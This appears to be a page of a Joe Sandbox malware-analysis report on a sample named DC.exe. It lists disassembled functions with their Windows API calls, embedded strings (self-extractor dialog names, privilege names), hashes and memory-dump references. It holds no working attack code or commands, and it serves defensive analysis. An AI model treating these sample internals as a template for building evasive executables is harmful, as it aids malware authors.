Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 3453d4f5442d92c2eb73327f6fc1cb9185afeef199e43903e43925efdfbbcb31
Instruction ID: 346b9a27844310ed46b93565677c74f159e0fd7e074147ddb38dd78d9260d5a9
Opcode Fuzzy Hash: 3453d4f5442d92c2eb73327f6fc1cb9185afeef199e43903e43925efdfbbcb31
Instruction Fuzzy Hash: 2901F7726016197F6321167A9C9CD7F6AADDEC6FA031501A9FB04C3100EF60CD05C5B0

Function 00BF9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00C11030,00000200,00BF91AD,00BF617E,?,?,?,?,00BDD984,?,?,?,00000004,00BDD710,?), ref: 00BF986E
_free.LIBCMT ref: 00BF98A3
_free.LIBCMT ref: 00BF98CA
SetLastError.KERNEL32(00000000,00C03A34,00000050,00C11030), ref: 00BF98D7
SetLastError.KERNEL32(00000000,00C03A34,00000050,00C11030), ref: 00BF98E0

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 764b6bc2bbdda4b695c94abf5010161f766c3201cae4d2793e22794bb9eecc8f
Instruction ID: f8c7127a86659d40b618f4222b4c32af578ad4b92b02d026e098ccb5b3804116
Opcode Fuzzy Hash: 764b6bc2bbdda4b695c94abf5010161f766c3201cae4d2793e22794bb9eecc8f
Instruction Fuzzy Hash: AD01D13614560D6BC3162669AC85B3F25EDDFD37F4B2201B9F705A3192EE348D0D9121

Function 00BE0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00BE11CF: ResetEvent.KERNEL32(?), ref: 00BE11E1
Part of subcall function 00BE11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BE11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BE0F21
CloseHandle.KERNEL32(?,?), ref: 00BE0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00BE0F54
CloseHandle.KERNEL32(?), ref: 00BE0F60
CloseHandle.KERNEL32(?), ref: 00BE0F6C

Part of subcall function 00BE0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
Part of subcall function 00BE0FE4: GetLastError.KERNEL32(?), ref: 00BE0FF6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 15ca15d0c16aa781671122f88892e1f59d9a3e18e03b8f8ffabca12c3238b39c
Instruction ID: 4021b7b52b0f548ceaa448df559cf1674737ad27497338d8be0c0efd4c72cca8
Opcode Fuzzy Hash: 15ca15d0c16aa781671122f88892e1f59d9a3e18e03b8f8ffabca12c3238b39c
Instruction Fuzzy Hash: 11017571101784EFC7229B65DC84BCAFBEDFB08B14F004969F15B52160C7B57A55CB90

Function 00BFC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BFC817

Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34), ref: 00BF8DE2
Part of subcall function 00BF8DCC: GetLastError.KERNEL32(00C03A34,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34,00C03A34), ref: 00BF8DF4

_free.LIBCMT ref: 00BFC829
_free.LIBCMT ref: 00BFC83B
_free.LIBCMT ref: 00BFC84D
_free.LIBCMT ref: 00BFC85F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e9d4d745941b5ed5524f83dd93699aacf5a1d407539c95b5abca974fbfdf942
Instruction ID: 0e4d09389bcecd991ebf60ea156b3900a0f99547a821b64e3146befdd03abbbf
Opcode Fuzzy Hash: 5e9d4d745941b5ed5524f83dd93699aacf5a1d407539c95b5abca974fbfdf942
Instruction Fuzzy Hash: E4F0623250421CABC720DB68E585E3A7BE9EE017907591CADF318D7592CB70FCC4CA50

Function 00BE1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BE1FE5
_wcslen.LIBCMT ref: 00BE1FF6
_wcslen.LIBCMT ref: 00BE2006
_wcslen.LIBCMT ref: 00BE2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BDB371,?,?,00000000,?,?,?), ref: 00BE202F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: e876839893e79035377908bfc8e9b92d693165d3779d87c594a50af271c5eab7
Instruction ID: 02eb22746f2b0311eaaacef92945591566edad16b5dd83aed9e6e114820ef7a0
Opcode Fuzzy Hash: e876839893e79035377908bfc8e9b92d693165d3779d87c594a50af271c5eab7
Instruction Fuzzy Hash: 53F09032008058BFCF262F51EC09DDE3FAAEF50B70B118485F61A5B0A2CB72D665D6E0

Function 00BEB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
IsDialogMessageW.USER32(000103FE,?), ref: 00BEB59E
TranslateMessage.USER32(?), ref: 00BEB5AC
DispatchMessageW.USER32(?), ref: 00BEB5B6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 497055cb07f4a98f5a6e565de23bf35e8d77846ba6ac55e84a487ca32c0635b8
Instruction ID: 30e207d2f45f394a7218af2d26141e6ba52da48468f9b2a84954fe5646d2068c
Opcode Fuzzy Hash: 497055cb07f4a98f5a6e565de23bf35e8d77846ba6ac55e84a487ca32c0635b8
Instruction Fuzzy Hash: 40F0BD71A1119AAB8B249BE69C4CFDF7FECEE053917004415B915D2050EB34D605CBB0

Function 00BF8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF891E

Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34), ref: 00BF8DE2
Part of subcall function 00BF8DCC: GetLastError.KERNEL32(00C03A34,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34,00C03A34), ref: 00BF8DF4

_free.LIBCMT ref: 00BF8930
_free.LIBCMT ref: 00BF8943
_free.LIBCMT ref: 00BF8954
_free.LIBCMT ref: 00BF8965

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ac0305dee7d045d656b7115bd4d89bff7d0dc1134b2713e8ce380fe76965df63
Instruction ID: af61847f82c087960bd83bd5bbd206ada8e24545a29640fcd5076bcb42991edd
Opcode Fuzzy Hash: ac0305dee7d045d656b7115bd4d89bff7d0dc1134b2713e8ce380fe76965df63
Instruction Fuzzy Hash: 18F0DA7582062A9BCF466F14FC0372E3BF1FF25764301199AF614572B1CB724945DB81

Function 00BE15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BE17BC
_swprintf.LIBCMT ref: 00BE186B

Strings

%s: %s, xrefs: 00BE17CB
%ls, xrefs: 00BE1641, 00BE1657

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 3f85889bd68031cc863110f99ff775f5d68209d95e31bde3da0933263565704a
Instruction ID: 232eab142c0ffa4fe5c56e48762a677c4331f87989cf5c6c1a6dcc7043415e22
Opcode Fuzzy Hash: 3f85889bd68031cc863110f99ff775f5d68209d95e31bde3da0933263565704a
Instruction Fuzzy Hash: FA51E0752483C0FAE6211A9E8DC6F3572D5AB15F04F344EC7F396644D1DBB2E810A72A

Function 00BF7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DC.exe,00000104), ref: 00BF7FAE
_free.LIBCMT ref: 00BF8079
_free.LIBCMT ref: 00BF8083

Strings

C:\Users\user\AppData\Local\Temp\DC.exe, xrefs: 00BF7FA5, 00BF7FAC, 00BF7FDB, 00BF8013

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\DC.exe
API String ID: 2506810119-2560200887
Opcode ID: e6627a1fa03055f27a96edf7e929a22c8e4e5559beb387e18cc87750b307e4db
Instruction ID: 5efac321640453d47b7899243393208f76d6e0d26cbe37b16ee6cf3a916f6750
Opcode Fuzzy Hash: e6627a1fa03055f27a96edf7e929a22c8e4e5559beb387e18cc87750b307e4db
Instruction Fuzzy Hash: 8E318F71A0021DAFDB21DFA9DC85EAEBBF8EF95310F5040EAF60497211DA718A48CB51

Function 00BF31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BF31FB
_abort.LIBCMT ref: 00BF3306

Strings

RCC, xrefs: 00BF3215
MOC, xrefs: 00BF320D

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 3e173be45b90aeff97f5c03ba10397a2e81d3965fe481ef8d5882fd25128aa00
Instruction ID: 2eef9a17145b3190bad49f6499d8f28f1f5f77c1b1f4ce803645006019407194
Opcode Fuzzy Hash: 3e173be45b90aeff97f5c03ba10397a2e81d3965fe481ef8d5882fd25128aa00
Instruction Fuzzy Hash: 0241467190020DAFCF15DF98CD81AAEBBF5FF48704F188099FA04A7222D335AA94DB54

Function 00BD7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD7406

Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BD74CD

Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00

Strings

SeSecurityPrivilege, xrefs: 00BD744B
SeRestorePrivilege, xrefs: 00BD7460

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 4bb8ececa5d9bfb9c10fc78203154a2e4c9e388c3f1c98fd4179b908e58d3eef
Instruction ID: 263839756c21dc62819c8f1f52a3ef457055c371ad8d16f5628e30d5d12ba65e
Opcode Fuzzy Hash: 4bb8ececa5d9bfb9c10fc78203154a2e4c9e388c3f1c98fd4179b908e58d3eef
Instruction Fuzzy Hash: 6B319371D44248AADF11EBA49C45BEEBBE9EF59304F0440A7F905A7381FB748A44CB61

Function 00BEAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

EndDialog.USER32(?,00000001), ref: 00BEAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BEADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BEADC2

Strings

ASKNEXTVOL, xrefs: 00BEAD28

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: ee1c13991e3a9f8ac90f901bbe501a5f381b0155cab47bf886a254df23a242e0
Instruction ID: f245846b321a6fd2112003149c9407d54b544ade0c197b61580085837f2a299e
Opcode Fuzzy Hash: ee1c13991e3a9f8ac90f901bbe501a5f381b0155cab47bf886a254df23a242e0
Instruction Fuzzy Hash: 2D11D332340240BFD3119F69EC45F6E7BEDEF4A702F0484A1F641DB5A0CB61AA159722

Function 00BDD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00BDD954
_strncpy.LIBCMT ref: 00BDD99A

Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4

Strings

$%s, xrefs: 00BDD949
@%s, xrefs: 00BDD93E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: c2bf149ad8a0e262592372c2750a40564a64b0dfd695ce200f417f27cfd458f8
Instruction ID: 804490b269d22b3192096bf22ab6f2e1eccafd802435aa78eb79d73d41881100
Opcode Fuzzy Hash: c2bf149ad8a0e262592372c2750a40564a64b0dfd695ce200f417f27cfd458f8
Instruction Fuzzy Hash: A321637254024CAADB21EFA4CC45FEEBBE8EF05704F0445A3F990962A2F376D648DB51

Function 00BE0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E9F

Strings

Thread pool initialization failed., xrefs: 00BE0EB7

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 76791d9759e55aa8e4689130b65ba507a49a6f2d7db7a1400f9c6282461f6079
Instruction ID: b3bfff0ebb1d08bf42f8b0016c08a4eabfbe65f49af232dfe033fbb8cc2fce71
Opcode Fuzzy Hash: 76791d9759e55aa8e4689130b65ba507a49a6f2d7db7a1400f9c6282461f6079
Instruction Fuzzy Hash: BE1151B1A547489FD3215F76DC84AABFBECEB69744F14487EF1DAC2200D7B159808B50

Function 00BEB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

EndDialog.USER32(?,00000001), ref: 00BEB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BEB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00BEB304

Strings

GETPASSWORD1, xrefs: 00BEB289

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 0307f829f4fce2729bcace890cf0ffbd4bd02ff203bcd2ae925430a5632abe31
Instruction ID: 9c95fb82cc0e66b647854fa6d57b6ba26c00368dcdb8066ec21517356c362983
Opcode Fuzzy Hash: 0307f829f4fce2729bcace890cf0ffbd4bd02ff203bcd2ae925430a5632abe31
Instruction Fuzzy Hash: 08110432900159B7DF219A65AC8AFFF7BACEF09710F0000A1FB46B21C0D7A4DA4097A1

Function 00BEDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00BEDD1C, 00BEDD50
RENAMEDLG, xrefs: 00BEDD31

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 8797dd318a1b3fdc6bfcde48ac583cd9d2d8426bbb2ae7945f751abec92958fe
